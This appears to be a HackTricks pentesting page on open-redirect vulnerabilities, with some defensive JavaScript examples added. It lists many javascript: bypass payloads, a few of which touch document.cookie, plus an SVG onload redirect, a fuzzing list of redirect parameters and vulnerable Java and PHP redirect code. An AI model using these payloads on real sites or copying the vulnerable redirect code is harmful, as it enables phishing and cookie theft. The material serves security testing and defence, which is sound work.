hacktricks/pentesting-web/open-redirect.md

<details>
<summary><strong>Learn AWS hacking from zero to expert with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF**, check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**Telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
# Open Redirect

## Redirect to localhost or arbitrary domains

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}

## Open Redirect to XSS

```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)
#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)
#Javascript with "://" (Notice that in JS "//" is a line comment, so a new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL of PHP
javascript://%250Aalert(1)
#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0
#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```

# Open Redirect uploading svg files

---

## Attack scenario

An attacker can exploit an open redirect vulnerability in the application to trick a user into uploading a malicious SVG file, and have malicious actions executed when the user visits a URL that contains the malicious SVG file.

## Attack description

The attacker uploads a malicious SVG file to the application and uses the open redirect vulnerability to build a malicious URL that redirects the user to the URL containing the malicious SVG file. When the user visits that URL, the browser parses the SVG file and executes the malicious code inside it, so the attack succeeds.

## Attack steps

1. The attacker uploads a malicious SVG file to the application.
2. The attacker builds a URL containing the malicious SVG file and exploits the open redirect vulnerability.
3. The user visits the malicious URL; the browser parses the SVG file and executes the malicious code inside it.

## Defensive recommendations

- The application's upload feature should strictly restrict the accepted file types and avoid accepting SVG files.
- Verify that the redirect URL is within the application's control, to prevent exploitation of open redirect vulnerabilities.

```markup
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
```

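The first defensive recommendation above (restrict upload types) is only effective if the check looks at the file content, not just the name. The following is an added example and not code from the HackTricks page: a Node.js upload check that rejects SVG/XML by extension and by content sniffing (so the redirecting SVG above is refused even when renamed to `.png`), plus the response headers for serving stored uploads as downloads rather than documents. The allow-list, function names and sample files are assumptions made for this illustration.

```javascript
// Added example, not code from the HackTricks page: image-only upload allow-list
// enforced on both extension and content, plus safe download headers.
// The allow-list, names and sample files below are assumptions for the demo.

const ALLOWED_EXTENSIONS = new Set(['png', 'jpg', 'jpeg', 'gif']); // assumption: SVG deliberately absent

// True if the first bytes look like XML/SVG/HTML rather than a binary image.
function looksLikeMarkup(buf) {
  let head = buf.subarray(0, 512).toString('utf8');
  if (head.charCodeAt(0) === 0xfeff) head = head.slice(1); // drop a UTF-8 BOM
  head = head.trimStart().toLowerCase();
  return ['<?xml', '<svg', '<!doctype svg', '<html', '<!doctype html'].some((p) => head.startsWith(p));
}

// True if the magic bytes match what the extension claims.
function magicMatches(ext, buf) {
  const PNG = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);
  switch (ext) {
    case 'png': return buf.subarray(0, 8).equals(PNG);
    case 'jpg':
    case 'jpeg': return buf[0] === 0xff && buf[1] === 0xd8 && buf[2] === 0xff;
    case 'gif': return buf.subarray(0, 4).toString('latin1') === 'GIF8';
    default: return false;
  }
}

// Decide whether an upload is accepted; returns { ok, reason }.
function checkUpload(filename, buf) {
  const ext = filename.includes('.') ? filename.split('.').pop().toLowerCase() : '';
  if (!ALLOWED_EXTENSIONS.has(ext)) return { ok: false, reason: 'extension not allowed' };
  if (looksLikeMarkup(buf)) return { ok: false, reason: 'content is markup, not an image' };
  if (!magicMatches(ext, buf)) return { ok: false, reason: 'magic bytes do not match extension' };
  return { ok: true, reason: '' };
}

// Response headers for serving a stored upload: force download, forbid MIME
// sniffing, and sandbox anything that is still rendered inline.
function downloadHeaders(storedName) {
  const safeName = storedName.replace(/[^A-Za-z0-9._-]/g, '_');
  return {
    'Content-Type': 'application/octet-stream',
    'Content-Disposition': `attachment; filename="${safeName}"`,
    'X-Content-Type-Options': 'nosniff',
    'Content-Security-Policy': "sandbox; default-src 'none'",
  };
}

// Constructed samples: the page's redirecting SVG, and a minimal PNG header.
const SAMPLE_SVG = Buffer.from(
  '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n' +
  '<svg onload="window.location=\'http://www.example.com\'" xmlns="http://www.w3.org/2000/svg"></svg>'
);
const SAMPLE_PNG = Buffer.concat([Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]), Buffer.alloc(16)]);

console.log(checkUpload('logo.svg', SAMPLE_SVG)); // rejected by extension
console.log(checkUpload('logo.png', SAMPLE_SVG)); // rejected by content sniff
console.log(checkUpload('logo.png', SAMPLE_PNG)); // accepted
```

The content sniff matters because browsers decide how to render a fetched resource from the `Content-Type` the server sends, and servers often derive that from the extension; an SVG stored as `logo.png` but served with an image type is harmless, but one served as `image/svg+xml` or opened directly is a document with script. The download headers close the remaining path by never presenting an upload as a document at all.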
# Common injection parameters
An open redirect vulnerability exists when a web application allows a user to redirect to an external site by manipulating the URL. This can be exploited by an attacker to redirect users to malicious websites to perform phishing attacks or distribute malware. To identify open redirect vulnerabilities, testers can manipulate parameters commonly used for redirection, such as:
- `url`
- `link`
- `next`
- `target`
By injecting malicious URLs into these parameters, testers can determine if the application is vulnerable to open redirects.
```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
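The same parameter list is useful on the defensive side: a redirect parameter whose value resolves to a foreign origin or to a non-http(s) scheme is exactly what the probes above leave behind in access logs. The following is an added example and not part of the HackTricks page: a Node.js scan over combined-format log lines that extracts query parameters, matches them against a subset of the names listed above, and flags values that would send the browser somewhere other than the application's own origin. The log lines, hostnames and the application origin are constructed for the demonstration.

```javascript
// Added example, not part of the HackTricks page: flag redirect-style query
// parameters in access-log lines whose value points off-origin or to a
// non-http(s) scheme. Log lines, hosts and APP_ORIGIN are constructed/assumed.

const APP_ORIGIN = 'https://app.example'; // assumption: the site's own origin

// Parameter names that commonly carry a redirect target (subset of the page's list).
const REDIRECT_PARAMS = new Set([
  'url', 'link', 'next', 'target', 'rurl', 'dest', 'destination', 'redir',
  'redirect', 'redirect_uri', 'redirect_url', 'return', 'returnto', 'return_to',
  'return_path', 'continue', 'go', 'goto', 'forward', 'forward_url', 'callback_url',
  'to', 'u', 'uri', 'location', 'backurl', 'redirecturl', 'returnurl',
]);

// Apache/nginx "combined" format: ... "METHOD target HTTP/x.y" status ...
const REQUEST_RE = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"\s+(\d{3})/;

// Where does the browser end up if the app redirects to this value verbatim?
function classifyTarget(value) {
  let u;
  try {
    u = new URL(value, APP_ORIGIN); // resolves "//host", "/\host", strips tabs/newlines
  } catch {
    return 'unparseable';
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return 'non-http scheme';
  if (u.origin !== APP_ORIGIN) return 'foreign origin';
  return 'same origin';
}

// Findings for one log line; empty array if nothing is suspicious.
function scanLine(line) {
  const m = REQUEST_RE.exec(line);
  if (!m) return [];
  const [, target, status] = m;
  let req;
  try {
    req = new URL(target, APP_ORIGIN);
  } catch {
    return [];
  }
  const findings = [];
  for (const [name, value] of req.searchParams) {
    if (!REDIRECT_PARAMS.has(name.toLowerCase())) continue;
    const verdict = classifyTarget(value);
    if (verdict === 'same origin') continue;
    findings.push({ param: name, value, verdict, status: Number(status) });
  }
  return findings;
}

// Scan a whole log; each finding carries its 1-based line number.
function scanLog(lines) {
  return lines.flatMap((line, i) => scanLine(line).map((f) => ({ line: i + 1, ...f })));
}

// Constructed sample lines (RFC 5737 test addresses, reserved .example hosts).
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /login?next=/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
  '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /login?next=//attacker.example/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /out?url=javascript://%250Aalert(1) HTTP/1.1" 302 0 "-" "curl/8.0"',
  '198.51.100.9 - - [10/Oct/2023:13:56:05 +0000] "GET /go?redirect_uri=https://app.example.attacker.example/cb HTTP/1.1" 302 0 "-" "curl/8.0"',
  '192.0.2.7 - - [10/Oct/2023:13:57:00 +0000] "GET /search?q=https://docs.example/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
];

console.log(scanLog(SAMPLE_LOG));
```

A `302` next to a flagged parameter is the interesting combination: it says the application actually followed the value. The same-origin `/account` line and the `q=` search line are skipped, which keeps the output focused on the parameters the list above tells you to watch.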

# Code examples

### .Net

```csharp
Response.Redirect("~/mysafe-subdomain/login.aspx");
```
### Java
#### Open Redirect
An open redirect occurs when a web application redirects to a user-supplied link without proper validation. Attackers can abuse this vulnerability to redirect users to malicious websites, phishing pages, or other harmful content.
##### Example
Consider the following vulnerable Java code snippet:
```java
String redirectUrl = request.getParameter("redirect");
response.sendRedirect(redirectUrl);
```
In this example, the web application blindly redirects users to the URL specified in the `redirect` parameter without any validation. An attacker can craft a malicious link like `http://vulnerable-website.com/?redirect=http://malicious-website.com` to redirect users to a harmful website.
##### Prevention
To prevent open redirect vulnerabilities in Java web applications, always validate and sanitize user-supplied input before using it to redirect users. Whitelist allowed URLs or domains and ensure that the redirect URL belongs to the expected domain.

```java
response.sendRedirect("http://mysafedomain.com");
```
### PHP
#### Open Redirect
An open redirect vulnerability exists when a web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. This can be abused by an attacker to craft a malicious link that redirects users to a phishing page or a malware download.
#### Example
Consider the following PHP code snippet:
```php
<?php
$redirect_url = $_GET['url'];
header('Location: ' . $redirect_url);
?>
```

In this code, the script takes a URL from the `url` parameter in the query string and redirects the user to that URL using the `header()` function. An attacker can exploit this by crafting a link like `http://example.com/redirect.php?url=http://malicious-site.com`.
#### Impact
The impact of an open redirect vulnerability includes phishing attacks, malware distribution, and social engineering attacks. It can be used in combination with other vulnerabilities to further compromise the security of a web application.
#### Remediation
To prevent open redirect vulnerabilities, always validate and sanitize user input before using it in a redirect. Whitelist allowed domains or use a safe redirect method that does not rely on user-controlled input.
```php
<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
```
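The Java and PHP prevention paragraphs above both say to allow-list the destination and make sure it belongs to the expected domain, and the "Open Redirect to XSS" section shows why a string filter is not enough: `//host`, `/\host`, tab-split `javascript:` and `javascript://` all slip past checks that look at the raw text. The following is an added example, not code from the HackTricks page nor from any of the frameworks above: a Node.js check that resolves the supplied value with the WHATWG `URL` parser (the same normalisation a browser applies) and accepts it only if the result is an http(s) URL on the application's own origin, shown next to the naive "starts with a single slash" check it replaces. The origin, function names and sample inputs are assumptions for the demo; the sample inputs are the decoded forms of payloads listed above.

```javascript
// Added example, not from the HackTricks page: same-origin redirect validation
// built on the WHATWG URL parser, next to the naive string check it replaces.
// APP_ORIGIN, names and the sample inputs are assumptions for this demo.

const APP_ORIGIN = 'https://app.example'; // assumption: the site's own origin

// The check many code bases use: "starts with one slash, so it must be local".
function naiveLooksLocal(target) {
  return target.startsWith('/') && !target.startsWith('//');
}

// Resolve the value against the app's origin exactly as a browser would, then
// accept only http(s) URLs whose origin is APP_ORIGIN and that carry no userinfo.
// Returns the normalised absolute URL, or null if the value must not be used.
function safeRedirectTarget(raw, appOrigin = APP_ORIGIN) {
  if (typeof raw !== 'string' || raw.length === 0 || raw.length > 2048) return null;
  let u;
  try {
    u = new URL(raw, appOrigin); // strips tab/CR/LF, maps "\" to "/", resolves "//host"
  } catch {
    return null; // unparseable input is never a valid destination
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null; // javascript:, data:, ...
  if (u.origin !== appOrigin) return null; // scheme, host and port must all match
  if (u.username || u.password) return null; // no "https://app.example@other" tricks
  return u.href;
}

// How a handler would use it: a rejected value falls back to a fixed location.
function redirectLocation(queryValue) {
  return safeRedirectTarget(queryValue) ?? `${APP_ORIGIN}/`;
}

// Decoded forms of payloads from the sections above, for a side-by-side view.
const SAMPLES = ['/account?tab=1', '//evil.example/', '/\\evil.example/', 'javascript:alert(1)',
  '\tJav\tascript:alert(1)', 'http://app.example/', 'https://app.example@evil.example/'];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), 'naive:', naiveLooksLocal(s), 'safe:', safeRedirectTarget(s));
}
```

Two details are worth keeping even when porting this to Java or PHP: compare the full origin (scheme, host, port) rather than the hostname, so `http://app.example` and `app.example.evil.example` are both rejected, and let the URL parser see the raw value before any check, because the parser is what removes the tabs and newlines the bypass payloads rely on.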

# Tools
* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)

# Resources
* In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) you can find fuzzing lists.
* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
* [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)